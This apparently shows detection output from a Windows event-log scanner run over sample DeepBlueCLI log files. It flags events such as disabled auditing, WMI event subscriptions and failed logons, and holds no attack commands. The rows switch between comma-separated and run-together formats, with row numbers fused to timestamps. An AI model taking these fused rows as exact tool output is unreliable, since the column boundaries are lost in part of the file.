7632016-08-19 00:29:27.609 +09:00IE10Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7642016-08-19 00:29:28.000 +09:00IE10Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
7652016-08-19 00:29:29.859 +09:00IE10Win74648informationalExplicit LogonSource User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7662016-08-19 00:29:29.859 +09:00IE10Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1aae1 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7672016-08-19 00:29:29.859 +09:00IE10Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1af2f : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7682016-08-19 00:29:29.859 +09:00IE10Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x1aae1rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7692016-08-19 00:31:31.000 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
7702016-08-19 00:31:31.000 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 01:24:07.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:24:07.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:24:10.343 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:24:10.343 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:31:43.146 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:33:09.568 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:34:07.677 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:35:01.052 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:36:08.912 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:40:11.872 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:41:14.715 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:42:51.887 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:52:23.564 +09:00,IE10Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:52:58.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 01:52:59.704 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:52:59.704 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:55:00.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 01:55:00.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
8012016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8022016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8032016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8042016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8052016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8062016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8072016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8082016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8092016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8102016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8112016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8122016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8132016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8142016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8152016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8162016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8172016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8182016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8192016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8202016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8212016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8222016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8232016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8242016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8252016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8262016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8272016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8282016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8292016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8302016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8312016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8322016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8332016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8342016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8352016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8362016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8372016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8382016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8392016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8402016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8412016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8422016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8432016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8442016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8452016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8462016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8472016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8482016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8492016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8502016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8512016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8522016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8532016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8542016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8552016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8562016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8572016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8582016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8592016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8602016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8612016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8622016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8632016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8642016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8652016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8662016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8672016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8682016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8692016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8702016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8712016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8722016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8732016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8742016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8752016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8762016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8772016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8782016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8792016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8802016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8812016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8822016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8832016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8842016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8852016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8862016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8872016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 02:39:39.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 02:39:39.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 03:46:19.937 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 03:46:20.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 03:57:18.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 03:57:18.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 03:57:20.937 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 03:57:20.937 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 04:55:50.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 04:55:51.755 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 04:55:51.755 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 04:57:52.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 04:57:52.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
